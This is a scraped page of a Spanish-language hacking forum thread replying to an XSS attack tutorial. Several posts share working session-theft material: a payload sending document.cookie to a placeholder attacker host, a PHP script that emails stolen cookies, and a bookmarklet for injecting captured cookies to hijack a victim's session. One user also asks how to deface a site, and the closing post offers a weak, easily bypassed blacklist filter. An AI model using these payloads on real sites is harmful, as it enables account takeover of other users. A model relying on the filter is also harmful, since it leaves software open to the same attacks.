elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 148,499 veces)
Ch@CaL

Desconectado Desconectado

Mensajes: 27


All in your mind....


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #30 en: 11 Septiembre 2006, 16:49 pm »

Muy buen manual man xo tengo una duda,yo entro x ejemplo en el foro,xa ello me he de registrar x lo tanto he de ser usuario xa poder colocar la url entonces al ser usuiario xa que quiero saber el pass de otro user me interesaria saber la del admin mejor no?ahi supongo que entra a formar parte la ingenieria social.Me apareceran en el text todas las cookies de todos los que lo pinxen?


En línea

Ch@CaL
|Azrack|

Desconectado Desconectado

Mensajes: 102


Enjoy The Silence


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #31 en: 6 Diciembre 2006, 00:03 am »

y si yo le paaso solo el enlace:
Código:
http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
no serviria xq para robar la cookie la redirecion tiene q' ser desde la web vulnerable?


En línea

security

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #32 en: 22 Mayo 2007, 17:06 pm »

<script>alert()</script>
En línea

Dr. Stephen Falken

Desconectado Desconectado

Mensajes: 1



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #33 en: 9 Enero 2008, 19:46 pm »

A día de hoy esta vulnerabilidad está casi capada. No?
En línea

NaphacK

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #34 en: 30 Enero 2008, 20:20 pm »

A día de hoy esta vulnerabilidad está casi capada. No?
No, aun se siguen encontrando vulnerables...
 Aunque tengo una duda...
 Que pasa si la pagina me dio acceso a unos archivos tipo ftp, lo que pasa es que me queda de una forma asi:
 www.webvulnerable.com/free-press/unaslibrerias   por esas librerias puedo navegar tranquilamente, y son scripts en java y php...
 Osea, aunque no sea un boton buscar, puedo ejecutar igual la url maligna?
 Saludos...
 ;) ;) ;)
En línea

merinodaniel

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #35 en: 20 Octubre 2008, 00:55 am »

hola a toos, justo he estado investigando XSS, y encontre q tb se puede hacer q se envie la cookie a un mail...

Código:
<?php
     $cookie = $_GET["cookie"];
     mail("admin@gensale.net", "Cookie stealer report", $cookie);
?>

este codigo seria para la pag: cookie.php
Este codigo fue publicado en el blog: blog.gensale.net
Yo no soy el autor..
byes
En línea

R007h

Desconectado Desconectado

Mensajes: 109

<script>alert('xss');</script>


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #36 en: 22 Diciembre 2008, 01:28 am »

Hola, sta muy bueno el txt...

ya me consegui unas cookies pero cuando me voy al site y pongo
Código:
javascript: prompt('',document.cookie);

luego reemplazo las cookies por las que yo consegui, no pasa nada, sigue estando cerrada la session de mi victima, que pasa?
En línea

<script>alert('xss');</scrip>
sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #37 en: 22 Diciembre 2008, 03:35 am »

usa este:
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});
En línea

slackbyte

Desconectado Desconectado

Mensajes: 88


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #38 en: 4 Febrero 2009, 09:08 am »

Que tal amigo, tengo una duda pues estoy algo novato en cuanto a los ataques XSS, un amigo queria que probara su servidor en busca de vulnerabilidades, y pues le intente con varias cosas, pero al probar lo de pnoer en el campo de texto <script>alert('vulnerable')</script> resulta que me saltó el mensaje de vulnerable. Ahora, la pregunta es ¿como puedo hacer un deface en su servidor? (conste que este chavo me dijo que no habia problema que le hiciera lo que quisiera a su sitio =P), es decir, yo puedo probar con:

<META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.google.com">

y con esto lograré que cualquier persona que entre a su sitio, sea redireccionado a google? pregunto esto ya que con el ejemplo del alert() a pesar de que me manda el mensaje, al actualizar el sitio ya no me devuelve el mensaje, y lo que quiero es que esa configuracion se quede guardada, o algo por el estilo consiste el ataque xss no es asi? me gustaria me apoyaras con un poco de explicacion al respecto, de como puedo alterar el sitio y otros usuarios puedan ver esos cambios. muchas gracias.
En línea

KarlosVid(ÊÇ)


Desconectado Desconectado

Mensajes: 473


..::(KarlosVidEC)::..


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #39 en: 12 Junio 2009, 20:53 pm »

Este es el Codigo permite proteger ataques xss  :rolleyes:

Código:
<?php 
function xss($val) {
$patron = '[ ]+';
$val= ereg_replace($patron,' ', $val);

$patron = '[ ]*>';
$val= ereg_replace($patron,'>', $val);

$a=array('xml','script', 'applet','embed','iframe','frame', 'frameset','ilayer');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
$tag='<'.$a[$i];
if(strpos($val,$tag)!==false){
$patron = $tag.'(.*)>(.*)<\/'.$a[$i].'[ ]*>';
$val= eregi_replace($patron,'', $val);
}
}

$a=array('link','meta','base');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,'<'.$a[$i])!==false){
$val= str_ireplace('<'.$a[$i],'<x',$val);
}
}

$a=array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload','http-equiv','content','charset');
$tot=count($a)-1;
for($i=0;$i<=$tot;$i++){
if(strpos($val,$a[$i].'=')!==false){
$val= str_ireplace($a[$i].'=','',$val);
}
}
return $val;
}

?>

:: wWw.SiDAT.Tk - wWw.SiDAT.Tk -wWw.SiDAT.Tk - wWw.SiDAT.Tk ::
En línea

Páginas: 1 2 3 [4] 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
OceanLotus APT usa el RAT Ratsnif en sus ataques
Noticias
wolfbcn 0 1,188 Último mensaje 3 Julio 2019, 02:07 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines